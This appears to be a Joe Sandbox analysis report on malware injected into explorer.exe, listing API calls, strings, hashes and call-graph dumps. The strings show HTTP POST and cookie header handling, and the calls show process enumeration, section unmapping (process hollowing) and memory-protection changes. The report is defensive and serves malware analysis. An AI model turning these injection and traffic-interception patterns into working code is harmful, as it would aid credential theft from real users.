                                  • String ID: $%s{:!:}%s{:!:}%s{:!:}$Content-Length:$Cookie:$Host:$User-Agent:$application/json$application/x-www-form-urlencoded${:!:}
                                  • API String ID: 2886538537-1627781280
                                  • Opcode ID: 6b06f765faa35a0d88aaab11fad6d1e7495b49b1bec6b2203fc1a68d1a52bb17
                                  • Instruction ID: 0ab628cf7cdd2d7bd700d5d11cd162a6a2ce618acf256a36fb072680de120010
                                  • Opcode Fuzzy Hash: 6b06f765faa35a0d88aaab11fad6d1e7495b49b1bec6b2203fc1a68d1a52bb17
                                  • Instruction Fuzzy Hash: 243193313002466BD704BB248C59BAF36AEBFC4B41F00443CFAC297283DA7999468BA1
                                  APIs
                                  • lstrlen.KERNEL32(00000000), ref: 0008322D
                                  • wsprintfA.USER32 ref: 0008329E
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 000832AF
                                  • lstrcat.KERNEL32(00000000,{:!:}), ref: 000832BE
                                  • lstrlen.KERNEL32(00000000), ref: 000832C1
                                  • RtlMoveMemory.NTDLL(00000000,?,?), ref: 000832D2
                                    • Part of subcall function 00081011: GetProcessHeap.KERNEL32(00000000,00000000,00000000,000814CB), ref: 00081020
                                    • Part of subcall function 00081011: HeapFree.KERNEL32(00000000), ref: 00081027
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.618009053.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: Heaplstrcatlstrlen$FreeMemoryMoveProcesswsprintf
                                  • String ID: %s{:!:}%s{:!:}%s{:!:}$POST${:!:}
                                  • API String ID: 3430864794-1604029033
                                  • Opcode ID: 34d713bb453a2b6e89e1fd23ceffbc516b4f29760a8a6e66774df0d2f5c2abac
                                  • Instruction ID: 195aec8412d902ec1d20601123c3bc2efe934f71044cf50dfad01e2279433394
                                  • Opcode Fuzzy Hash: 34d713bb453a2b6e89e1fd23ceffbc516b4f29760a8a6e66774df0d2f5c2abac
                                  • Instruction Fuzzy Hash: 23415E71104345AFD311EF10DC48EABBBEDFF88745F00092EF58296252DB799A49CBA6
                                  APIs
                                  • RtlEnterCriticalSection.NTDLL(00086038), ref: 00083455
                                  • lstrcat.KERNEL32 ref: 000834AB
                                    • Part of subcall function 00082FAA: RtlZeroMemory.NTDLL(?,0000000A), ref: 00082FFA
                                    • Part of subcall function 00082FAA: StrToIntA.SHLWAPI(?), ref: 00083024
                                    • Part of subcall function 00082FAA: lstrlen.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00083347), ref: 00083052
                                    • Part of subcall function 00082FAA: wsprintfA.USER32 ref: 000830B9
                                    • Part of subcall function 00082FAA: lstrcat.KERNEL32(00000000,00000000), ref: 000830E5
                                    • Part of subcall function 00082F1F: CreateThread.KERNEL32(00000000,00000000,00082ED2,?,00000000,00000000), ref: 00082F2F
                                    • Part of subcall function 00082F1F: CloseHandle.KERNEL32(00000000), ref: 00082F36
                                    • Part of subcall function 0008105D: VirtualFree.KERNEL32(?,00000000,00008000,00082B4B), ref: 00081065
                                  • RtlZeroMemory.NTDLL(0000000A,0000000A), ref: 00083504
                                  • StrToIntA.SHLWAPI(?), ref: 0008352B
                                  • RtlMoveMemory.NTDLL(00000000,?,-00000003), ref: 0008358D
                                  • RtlLeaveCriticalSection.NTDLL(00086038), ref: 000835C1
                                    • Part of subcall function 00081274: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00081281
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.618009053.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: Memory$CriticalSectionVirtualZerolstrcat$CloseCreateEnterFreeHandleLeaveMoveQueryThreadlstrlenwsprintf
                                  • String ID: $Content-Length:$POST
                                  • API String ID: 2960674810-114478848
                                  • Opcode ID: 33a795ee5d16a2d667be42fa0e9aab825ee56be8159edec6b824bf9d928f01f4
                                  • Instruction ID: 94e072d73854c321fe1628760210cd651d563a19d9d3a009ac864edf1f9d31a3
                                  • Opcode Fuzzy Hash: 33a795ee5d16a2d667be42fa0e9aab825ee56be8159edec6b824bf9d928f01f4
                                  • Instruction Fuzzy Hash: 7931C4306043418BEB11BF64D9686AB7BA9BF84701F01042DEAC29B353CB7E990DCF59
                                  APIs
                                    • Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,00000208,00081418), ref: 00081003
                                    • Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                    • Part of subcall function 0008106C: lstrlen.KERNEL32(?,?,00000000,00000000,0008189F,75712B62,?,00000000), ref: 00081074
                                    • Part of subcall function 0008106C: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000), ref: 00081086
                                    • Part of subcall function 000817DC: RtlZeroMemory.NTDLL(?,00000018), ref: 000817EE
                                  • RtlZeroMemory.NTDLL(?,0000003C), ref: 000818FB
                                  • wsprintfW.USER32 ref: 000819F2
                                  • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 00081AD0
                                  Strings
                                  • Accept: */*Referer: %S, xrefs: 000819E8
                                  • Content-Type: application/x-www-form-urlencoded, xrefs: 00081A34
                                  • POST, xrefs: 000819A0
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.618009053.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: Memory$HeapZero$AllocateByteCharMoveMultiProcessWidelstrlenwsprintf
                                  • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$POST
                                  • API String ID: 3833683434-704803497
                                  • Opcode ID: c7c917da75e3de295780b2872cffdc73b6cef6b8f53e9712146f35d9d993187b
                                  • Instruction ID: 3dcbdeb0ded9a8cf15a9f97d83848ce06ad77dce3e8d70dcbeb4fea29dcfcf14
                                  • Opcode Fuzzy Hash: c7c917da75e3de295780b2872cffdc73b6cef6b8f53e9712146f35d9d993187b
                                  • Instruction Fuzzy Hash: 648145B1608301AFD714AF68DC88AABBAEDFF88744F00092DF585D3251EB75D946CB52
                                  APIs
                                    • Part of subcall function 0008104C: VirtualAlloc.KERNEL32(00000000,00001105,00003000,00000040,00082A16,?,00000001), ref: 00081056
                                  • lstrcat.KERNEL32(?,00000000), ref: 000825BB
                                  • lstrcat.KERNEL32(?,000842A8), ref: 000825C7
                                  • lstrcat.KERNEL32(?,?), ref: 000825D6
                                  • lstrcat.KERNEL32(?,000842AC), ref: 000825E5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.618009053.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: lstrcat$AllocVirtual
                                  • String ID: :authority$?$dyn_header
                                  • API String ID: 3028025275-1785586894
                                  • Opcode ID: ccb5b8e22301a9bf3d49878ed53380449b588dc010ab43c1b70d9856686de837
                                  • Instruction ID: a3df1192de0655e9dc7a3e2b16972a5207b0361e37cf12fd9c8c807a48e009f7
                                  • Opcode Fuzzy Hash: ccb5b8e22301a9bf3d49878ed53380449b588dc010ab43c1b70d9856686de837
                                  • Instruction Fuzzy Hash: CC61E3725087128FC710FE24D5906AEB7E6BB94350F44092DF8C157283EA399E0EDB62
                                  APIs
                                    • Part of subcall function 00081141: lstrlen.KERNEL32(?,?,?,00000000,?,000829DD,00000001), ref: 00081150
                                    • Part of subcall function 00081141: lstrlen.KERNEL32(:method POST,?,00000000,?,000829DD,00000001), ref: 00081155
                                  • RtlMoveMemory.NTDLL(?,?,-00000008), ref: 0008291B
                                  • lstrcat.KERNEL32(?,000842BC), ref: 0008292A
                                  • lstrlen.KERNEL32(?,75712B62,00000001,?,?,00000000,?,?,00082B26,?,?,?,?,00000001), ref: 0008295C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.618009053.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: lstrlen$MemoryMovelstrcat
                                  • String ID: cookie
                                  • API String ID: 2957667536-1295510418
                                  • Opcode ID: c5afd10081fade78214e6a68e20e854c8f611a32984c2bd6fd75a9e92cb63cea
                                  • Instruction ID: f53226ebe774a6e1b9e5076833723ffb49a62c81fd320fd2bb11fdc6a523b402
                                  • Opcode Fuzzy Hash: c5afd10081fade78214e6a68e20e854c8f611a32984c2bd6fd75a9e92cb63cea
                                  • Instruction Fuzzy Hash: 0411B7323083029BD711BE94DC89B9BB7D9FF90714F14052DFDC197242EAB5E80A4791
                                  APIs
                                  • OpenProcess.KERNEL32(00000400,00000000), ref: 000812BC
                                  • IsWow64Process.KERNEL32(000000FF,?), ref: 000812CE
                                  • IsWow64Process.KERNEL32(00000000,?), ref: 000812E1
                                  • CloseHandle.KERNEL32(00000000), ref: 000812F7
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.618009053.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: Process$Wow64$CloseHandleOpen
                                  • String ID:
                                  • API String ID: 331459951-0
                                  • Opcode ID: 8045010c9cbfc985abfaa60064913a4c16ec6c63ecb239f4c664f1a8ebcca392
                                  • Instruction ID: 4c13458c48fa9fbbcfea10e07012997bffba25426b6b543f99b22ac2bec5ef8b
                                  • Opcode Fuzzy Hash: 8045010c9cbfc985abfaa60064913a4c16ec6c63ecb239f4c664f1a8ebcca392
                                  • Instruction Fuzzy Hash: 1DF09071806219FFAB20DFA0AD449EFBBBCFF01251F20426AE941D2140DB354E029BA1
                                  APIs
                                  • RtlEnterCriticalSection.NTDLL(00086038), ref: 00083332
                                  • RtlLeaveCriticalSection.NTDLL(00086038), ref: 00083358
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.618009053.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: CriticalSection$EnterLeave
                                  • String ID: POST
                                  • API String ID: 3168844106-1814004025
                                  • Opcode ID: 4920001e8e38d461796a27dbbcaa1cd07135c44c448d8fe26b08c9534abdbfff
                                  • Instruction ID: 55dcfb8202f6423abaeb440588ec9f58bbec6868fc7e7fe62f416efc705c6caf
                                  • Opcode Fuzzy Hash: 4920001e8e38d461796a27dbbcaa1cd07135c44c448d8fe26b08c9534abdbfff
                                  • Instruction Fuzzy Hash: 63018131500114EBDB213F20EC4889F7FA9FFC5BA17184020FA8A96222DF36DE51DBA1

                                  Execution Graph

                                  Execution Coverage:7.7%
                                  Dynamic/Decrypted Code Coverage:23.1%
                                  Signature Coverage:0%
                                  Total number of Nodes:39
                                  Total number of Limit Nodes:4
                                  execution_graph 1514 6d637 1515 6d62e 1514->1515 1517 6d6f8 1515->1517 1518 6d748 1515->1518 1520 6d74d 1518->1520 1519 6d835 LoadLibraryA 1519->1520 1520->1519 1522 6d884 VirtualProtect VirtualProtect 1520->1522 1524 6d879 1520->1524 1523 6d912 1522->1523 1523->1523 1524->1517 1484 64914 1498 61d08 CreateToolhelp32Snapshot 1484->1498 1487 61d08 5 API calls 1488 64941 1487->1488 1489 61d08 5 API calls 1488->1489 1490 6494d SleepEx 1489->1490 1505 61838 1490->1505 1492 64962 SHGetSpecialFolderPathW 1494 6497b 1492->1494 1495 649e0 1492->1495 1493 64a18 1494->1495 1497 61eb4 FindFirstFileW FindFirstFileW 1494->1497 1495->1493 1496 61eb4 FindFirstFileW FindFirstFileW 1495->1496 1496->1493 1497->1494 1499 61d2c Process32First 1498->1499 1500 61d7a 1498->1500 1501 61d56 1499->1501 1500->1487 1502 61d44 lstrcmpi 1501->1502 1503 61d71 CloseHandle 1501->1503 1504 61d5f Process32Next 1501->1504 1502->1501 1502->1504 1503->1500 1504->1501 1506 61847 1505->1506 1525 6d5da 1526 6d614 1525->1526 1527 6d748 3 API calls 1526->1527 1528 6d6f8 1526->1528 1527->1528 1507 6d748 1509 6d74d 1507->1509 1508 6d835 LoadLibraryA 1508->1509 1509->1508 1511 6d884 VirtualProtect VirtualProtect 1509->1511 1513 6d879 1509->1513 1512 6d912 1511->1512 1512->1512

                                  Callgraph

                                  • Executed
                                  • Not Executed
                                  • Opacity -> Relevance
                                  • Disassembly available
                                  callgraph 0 Function_00061A04 1 Function_00065104 1->0 4 Function_00062C00 1->4 25 Function_00063F20 1->25 29 Function_00061C28 1->29 33 Function_00061838 1->33 34 Function_00061938 1->34 57 Function_00061B74 1->57 63 Function_00061C80 1->63 83 Function_00061CA0 1->83 99 Function_00061BC8 1->99 110 Function_00061BE8 1->110 2 Function_00061405 3 Function_00065300 3->1 3->3 3->33 66 Function_00064C80 3->66 3->110 13 Function_00062B14 4->13 98 Function_000629C0 4->98 4->110 5 Function_00061000 6 Function_0006370C 6->0 7 Function_0006CC0D 8 Function_0006D70A 9 Function_00061D08 104 Function_00061CD0 9->104 10 Function_00061508 11 Function_0006D416 12 Function_00064914 12->9 12->33 50 Function_00061860 12->50 88 Function_00061EB4 12->88 14 Function_00062214 14->33 15 Function_00064C14 16 Function_00064710 16->0 74 Function_00064094 16->74 97 Function_00063FC0 16->97 103 Function_000618D0 16->103 16->110 111 Function_000618E8 16->111 113 Function_00063CF0 16->113 116 Function_00063FF8 16->116 17 Function_00062F10 17->33 18 Function_00064B1E 19 Function_0006311C 20 Function_0006211C 21 Function_0006141D 22 Function_00063818 22->0 22->6 22->33 22->50 78 Function_00063690 22->78 22->103 107 Function_000621E4 22->107 22->111 23 Function_00063424 24 Function_00061822 39 Function_00063E4C 25->39 26 Function_00064B2E 27 Function_00064C2E 28 Function_0006D42D 30 Function_0006D637 40 Function_0006D748 30->40 31 Function_0006343C 32 Function_00063C3C 41 Function_00063B48 32->41 46 Function_0006345C 32->46 32->111 35 Function_00062838 36 Function_00064C42 37 Function_00064540 64 Function_00064280 37->64 37->97 37->110 38 Function_0006624F 39->33 39->50 40->8 41->17 59 Function_0006317C 41->59 42 Function_00063048 42->33 43 Function_00061254 44 Function_00062754 45 Function_00064B5E 46->33 71 Function_0006188C 46->71 46->110 47 Function_00064C5C 48 Function_00062964 79 Function_0006299C 48->79 49 Function_0006CD63 50->110 51 Function_00061560 52 Function_00063F60 52->14 52->50 68 Function_0006268C 52->68 52->111 53 Function_00064B6F 54 Function_0006156C 55 Function_00062368 55->33 55->34 55->50 55->71 81 Function_00062298 55->81 55->103 115 Function_000618F8 55->115 56 Function_00061576 58 Function_0006D57E 59->19 59->42 59->50 75 Function_00063094 59->75 59->103 60 Function_0006277C 60->44 60->48 60->103 61 Function_00064A7C 62 Function_00062F84 64->0 64->33 64->50 65 Function_00064680 65->64 65->97 65->110 66->20 66->33 66->50 66->60 70 Function_00061A8C 66->70 80 Function_00063D9C 66->80 102 Function_000628D4 66->102 66->110 67 Function_0006628F 68->33 68->50 68->55 69 Function_00061D8C 71->33 72 Function_00063B8C 72->0 72->41 72->46 72->111 73 Function_00062F88 74->0 74->33 74->50 74->116 75->33 75->50 75->73 76 Function_0006CD92 77 Function_00063A90 77->14 77->50 77->68 77->111 78->0 82 Function_000644A4 82->74 82->97 82->113 84 Function_00064BA0 85 Function_00063CAC 85->46 86 Function_00064AA9 87 Function_0006CFB7 88->33 88->50 88->69 90 Function_00061DB0 88->90 89 Function_000614B2 90->33 90->50 90->69 90->88 91 Function_00061FB0 92 Function_00064BB0 93 Function_0006D0BB 94 Function_00064BB8 95 Function_0006D4C4 96 Function_0006D0C3 100 Function_000614D4 101 Function_00061FD4 101->33 101->50 101->91 101->101 102->35 102->44 102->110 105 Function_000672D0 106 Function_0006D5DA 106->40 108 Function_0006CCE2 109 Function_000645E0 109->64 109->97 109->110 112 Function_00063AF0 112->22 114 Function_000635FC 112->114 113->23 113->31 113->32 113->72 113->85 113->110 113->112 114->50 114->110 116->0 117 Function_000614F9

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 90 61db0-61e10 call 61838 FindFirstFileW 94 61e12-61e17 90->94 95 61e8e-61eb2 call 61860 90->95 96 61e73-61e83 94->96 97 61e19-61e25 call 61d8c 94->97 96->94 103 61e85-61e86 96->103 97->96 104 61e27-61e60 call 61838 call 61eb4 97->104 103->95 110 61e62-61e63 104->110 111 61e6b-61e6e call 61860 104->111 110->111 111->96
                                  APIs
                                  • FindFirstFileW.KERNELBASE ref: 00061E03
                                    • Part of subcall function 00061EB4: FindFirstFileW.KERNELBASE ref: 00061F05
                                  Memory Dump Source
                                  • Source File: 00000017.00000002.565039689.0000000000061000.00000040.80000000.00040000.00000000.sdmp, Offset: 00061000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_23_2_61000_explorer.jbxd
                                  Similarity
                                  • API ID: FileFindFirst
                                  • String ID:
                                  • API String ID: 1974802433-0
                                  • Opcode ID: f2bddda09024333371eb43016242b53df61dfea823ae35ba426e9e4184a3369c
                                  • Instruction ID: 09714fee1153d0c8a0d09558f17c057e038896d471caa2abecd38832798f4051
                                  • Opcode Fuzzy Hash: f2bddda09024333371eb43016242b53df61dfea823ae35ba426e9e4184a3369c
                                  • Instruction Fuzzy Hash: EB21933021CE084FDB98FB2CA8992E937D2EB98350F44066DF94EC3296DE38D90587C5

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 113 61eb4-61f12 call 61db0 call 61838 FindFirstFileW 119 61f14-61f19 113->119 120 61f8f-61faf call 61860 113->120 122 61f74-61f84 119->122 123 61f1b-61f27 call 61d8c 119->123 122->119 129 61f86-61f87 122->129 123->122 128 61f29-61f53 call 61838 123->128 133 61f55-61f5b 128->133 134 61f63-61f6f call 61860 128->134 129->120 133->134 134->122
                                  APIs
                                    • Part of subcall function 00061DB0: FindFirstFileW.KERNELBASE ref: 00061E03
                                  • FindFirstFileW.KERNELBASE ref: 00061F05
                                  Memory Dump Source
                                  • Source File: 00000017.00000002.565039689.0000000000061000.00000040.80000000.00040000.00000000.sdmp, Offset: 00061000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_23_2_61000_explorer.jbxd
                                  Similarity
                                  • API ID: FileFindFirst
                                  • String ID:
                                  • API String ID: 1974802433-0
                                  • Opcode ID: 0e40d73f1c3fb02f90445bbd535556d967509254f5ca54610527c95814f758f5
                                  • Instruction ID: f6f10a3c91a1c7be2883bec74a9f7d87337c7723b26a9329405511652b3714a0
                                  • Opcode Fuzzy Hash: 0e40d73f1c3fb02f90445bbd535556d967509254f5ca54610527c95814f758f5
                                  • Instruction Fuzzy Hash: 5B21447020CB484FDF84FF28A4997E977E2FBA8344F04066DA55AC3292DF38D9448785

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 137 65300-65310 call 61be8 140 65312-65345 call 61838 137->140 141 65390-65395 137->141 145 65347 call 61838 140->145 146 65371-6538a NtUnmapViewOfSection 140->146 150 6534c-65365 145->150 148 6539c-653ab call 65104 146->148 149 6538c-6538e 146->149 155 653b5-653be 148->155 156 653ad-653b0 call 65300 148->156 149->141 151 65396-6539b call 64c80 149->151 150->146 151->148 156->155
                                  APIs
                                  • NtUnmapViewOfSection.NTDLL ref: 00065378
                                  Memory Dump Source
                                  • Source File: 00000017.00000002.565039689.0000000000061000.00000040.80000000.00040000.00000000.sdmp, Offset: 00061000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_23_2_61000_explorer.jbxd
                                  Similarity
                                  • API ID: SectionUnmapView
                                  • String ID:
                                  • API String ID: 498011366-0
                                  • Opcode ID: a5808401f40c052098661eb7ec96139c2b9ca3f0c031a4bcca73572e40d2a868
                                  • Instruction ID: a41e593be866e3ab021910bfc825c372ad5ca9bfff955d7c7ff76e928a4655b8
                                  • Opcode Fuzzy Hash: a5808401f40c052098661eb7ec96139c2b9ca3f0c031a4bcca73572e40d2a868
                                  • Instruction Fuzzy Hash: 5311C630601D094FEB9DFBB998992B933D6EB14312F54053AE415C73A2EE698B808340

                                  Control-flow Graph

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000017.00000002.565039689.0000000000061000.00000040.80000000.00040000.00000000.sdmp, Offset: 00061000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_23_2_61000_explorer.jbxd
                                  Similarity
                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcmpi
                                  • String ID:
                                  • API String ID: 868014591-0
                                  • Opcode ID: ae82cc3535c3e538fde35235a4c5f0d33198cca8bd70fb29295229ff6f9da322
                                  • Instruction ID: fe06e9a5fd9309b4dc20b59eb16795e60247cbb6a137393a0b42ea9f151a395c
                                  • Opcode Fuzzy Hash: ae82cc3535c3e538fde35235a4c5f0d33198cca8bd70fb29295229ff6f9da322
                                  • Instruction Fuzzy Hash: 8001FF30208A088FD755EF28D8887EE76E2FBD8315F14462DA15AC61A5DB38D9458B45

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 9 6d748-6d74b 10 6d755-6d759 9->10 11 6d765 10->11 12 6d75b-6d763 10->12 13 6d767 11->13 14 6d74d-6d753 11->14 12->11 15 6d76a-6d771 13->15 14->10 17 6d773-6d77b 15->17 18 6d77d 15->18 17->18 18->15 19 6d77f-6d782 18->19 20 6d797-6d7a4 19->20 21 6d784-6d792 19->21 31 6d7a6-6d7a8 20->31 32 6d7be-6d7cc call 6d70a 20->32 22 6d794-6d795 21->22 23 6d7ce-6d7e9 21->23 22->20 24 6d81a-6d81d 23->24 26 6d822-6d829 24->26 27 6d81f-6d820 24->27 30 6d82f-6d833 26->30 29 6d801-6d805 27->29 33 6d807-6d80a 29->33 34 6d7eb-6d7ee 29->34 35 6d884-6d88d 30->35 36 6d835-6d84e LoadLibraryA 30->36 39 6d7ab-6d7b2 31->39 32->10 33->26 40 6d80c-6d810 33->40 34->26 37 6d7f0 34->37 38 6d890-6d899 35->38 42 6d84f-6d856 36->42 43 6d7f1-6d7f5 37->43 44 6d8be-6d90e VirtualProtect * 2 38->44 45 6d89b-6d89d 38->45 56 6d7b4-6d7ba 39->56 57 6d7bc 39->57 40->43 46 6d812-6d819 40->46 42->30 48 6d858-6d86e 42->48 43->29 49 6d7f7-6d7f9 43->49 53 6d912-6d917 44->53 50 6d8b0-6d8bc 45->50 51 6d89f-6d8ae 45->51 46->24 59 6d870-6d877 48->59 60 6d879-6d883 48->60 49->29 55 6d7fb-6d7ff 49->55 50->51 51->38 53->53 58 6d919-6d928 53->58 55->29 55->33 56->57 57->32 57->39 59->42
                                  APIs
                                  • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,F6171042,?,2EC0275B), ref: 0006D847
                                  • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-00000003), ref: 0006D8E5
                                  • VirtualProtect.KERNELBASE ref: 0006D903
                                  Memory Dump Source
                                  • Source File: 00000017.00000002.565039689.000000000006C000.00000040.80000000.00040000.00000000.sdmp, Offset: 0006C000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_23_2_6c000_explorer.jbxd
                                  Similarity
                                  • API ID: ProtectVirtual$LibraryLoad
                                  • String ID:
                                  • API String ID: 895956442-0
                                  • Opcode ID: 95f77aaacabe58910e5c9c5c8887ec348e2c323c674e048d1baf7834c42d2dbf
                                  • Instruction ID: fb22e33ff937d24d93fb2efd063ba145730d0834d4eb26fcdd67a2d867c28293
                                  • Opcode Fuzzy Hash: 95f77aaacabe58910e5c9c5c8887ec348e2c323c674e048d1baf7834c42d2dbf
                                  • Instruction Fuzzy Hash: 23515A32B5891D4FCB24AA3C9CC87F9B7D2F755325B58063BC49AC3285EE58D84683C2

                                  Control-flow Graph

                                  APIs
                                    • Part of subcall function 00061D08: CreateToolhelp32Snapshot.KERNEL32 ref: 00061D1D
                                    • Part of subcall function 00061D08: Process32First.KERNEL32 ref: 00061D3C
                                    • Part of subcall function 00061D08: CloseHandle.KERNELBASE ref: 00061D74
                                    • Part of subcall function 00061D08: lstrcmpi.KERNEL32 ref: 00061D4C
                                    • Part of subcall function 00061D08: Process32Next.KERNEL32 ref: 00061D67
                                  • SleepEx.KERNEL32 ref: 00064952
                                  • SHGetSpecialFolderPathW.SHELL32 ref: 00064971
                                    • Part of subcall function 00061EB4: FindFirstFileW.KERNELBASE ref: 00061F05
                                  Memory Dump Source
                                  • Source File: 00000017.00000002.565039689.0000000000061000.00000040.80000000.00040000.00000000.sdmp, Offset: 00061000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_23_2_61000_explorer.jbxd
                                  Similarity
                                  • API ID: FirstProcess32$CloseCreateFileFindFolderHandleNextPathSleepSnapshotSpecialToolhelp32lstrcmpi
                                  • String ID:
                                  • API String ID: 545558411-0
                                  • Opcode ID: d94504f5ac59451a2c57a4813436b0da2714d47fc540bee79ff9f433ebcff8c2
                                  • Instruction ID: fd7257a88bddf19c1770b39e9a1f92ec56404b8002fce2def5eb906a896e2c11
                                  • Opcode Fuzzy Hash: d94504f5ac59451a2c57a4813436b0da2714d47fc540bee79ff9f433ebcff8c2
                                  • Instruction Fuzzy Hash: A0317331618A084FDB59FF68E8995EA73E3FB98301B14462EE44BC3262DE34D9458BC1

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 87 61b74-61b94 OpenFileMappingA 88 61b96-61bb4 MapViewOfFile 87->88 89 61bb7-61bc4 87->89 88->89
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000017.00000002.565039689.0000000000061000.00000040.80000000.00040000.00000000.sdmp, Offset: 00061000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_23_2_61000_explorer.jbxd
                                  Similarity
                                  • API ID: File$MappingOpenView
                                  • String ID:
                                  • API String ID: 3439327939-0
                                  • Opcode ID: 91acf1a8eced4a93386cc206dc094dd57211145f7045cabbad6f077073a0bd29
                                  • Instruction ID: ddaee3d7e8f9e73a22afb263a5f2562a7b1b5803ba9d96df92eae33d24df65e4
                                  • Opcode Fuzzy Hash: 91acf1a8eced4a93386cc206dc094dd57211145f7045cabbad6f077073a0bd29
                                  • Instruction Fuzzy Hash: A5F01C35318F094FAB44EF7C9C8C576B7E1EBA8202B048A7EA95AC7165EF74C8818751

                                  Execution Graph

                                  Execution Coverage:10.3%
                                  Dynamic/Decrypted Code Coverage:97.4%
                                  Signature Coverage:0%
                                  Total number of Nodes:306
                                  Total number of Limit Nodes:42
                                  execution_graph 707 87728 708 87904 707->708 709 8774b 707->709 708->708 710 8785a LoadLibraryA 709->710 714 8789f VirtualProtect VirtualProtect 709->714 711 87871 710->711 711->709 713 87883 GetProcAddress 711->713 713->711 715 87899 713->715 714->708 991 8245e lstrlen 992 824a5 991->992 993 82476 CryptBinaryToStringA 991->993 993->992 994 82489 993->994 997 82861 GetProcessHeap RtlAllocateHeap 994->997 996 82494 CryptBinaryToStringA 996->992 997->996 716 81000 717 81010 716->717 718 81007 716->718 720 81016 718->720 769 82608 VirtualQuery 720->769 723 81097 723->717 725 8102c RtlMoveMemory 726 8104d 725->726 727 81071 NtUnmapViewOfSection GetCurrentProcessId 725->727 806 82861 GetProcessHeap RtlAllocateHeap 726->806 729 8109e 727->729 730 81092 727->730 772 810a4 729->772 730->723 731 81095 730->731 807 81332 731->807 733 81052 RtlMoveMemory 733->727 734 810a3 736 82861 GetProcessHeap RtlAllocateHeap 734->736 737 810cc 736->737 738 810dc CreateToolhelp32Snapshot 737->738 739 810f0 Process32First 738->739 740 81322 Sleep 738->740 741 8131b CloseHandle 739->741 742 8110c lstrcmpi 739->742 740->738 741->740 743 81124 lstrcmpi 742->743 765 81280 742->765 745 81138 lstrcmpi 743->745 743->765 744 825ad OpenProcess IsWow64Process IsWow64Process CloseHandle 744->765 746 8114c lstrcmpi 745->746 745->765 747 81160 lstrcmpi 746->747 746->765 749 81170 lstrcmpi 747->749 747->765 748 81305 Process32Next 748->742 750 81319 748->750 751 81184 lstrcmpi 749->751 749->765 750->741 752 81198 lstrcmpi 751->752 751->765 753 811ac lstrcmpi 752->753 752->765 754 811c0 lstrcmpi 753->754 753->765 755 811d4 lstrcmpi 754->755 754->765 756 811e8 lstrcmpi 755->756 755->765 758 811fc lstrcmpi 756->758 756->765 757 82608 VirtualQuery 757->765 759 8120c lstrcmpi 758->759 758->765 761 8121c lstrcmpi 759->761 759->765 760 812ae lstrcmpi 760->765 762 8122c lstrcmpi 761->762 761->765 763 8123c lstrcmpi 762->763 762->765 763->765 766 8124c lstrcmpi 763->766 764 81819 30 API calls 764->765 765->744 765->748 765->757 765->760 765->764 766->765 767 8125c lstrcmpi 766->767 767->765 768 8126c lstrcmpi 767->768 768->748 768->765 770 8101e 769->770 770->723 771 82861 GetProcessHeap RtlAllocateHeap 770->771 771->725 834 82861 GetProcessHeap RtlAllocateHeap 772->834 774 810cc 775 810dc CreateToolhelp32Snapshot 774->775 776 810f0 Process32First 775->776 777 81322 Sleep 775->777 778 8131b 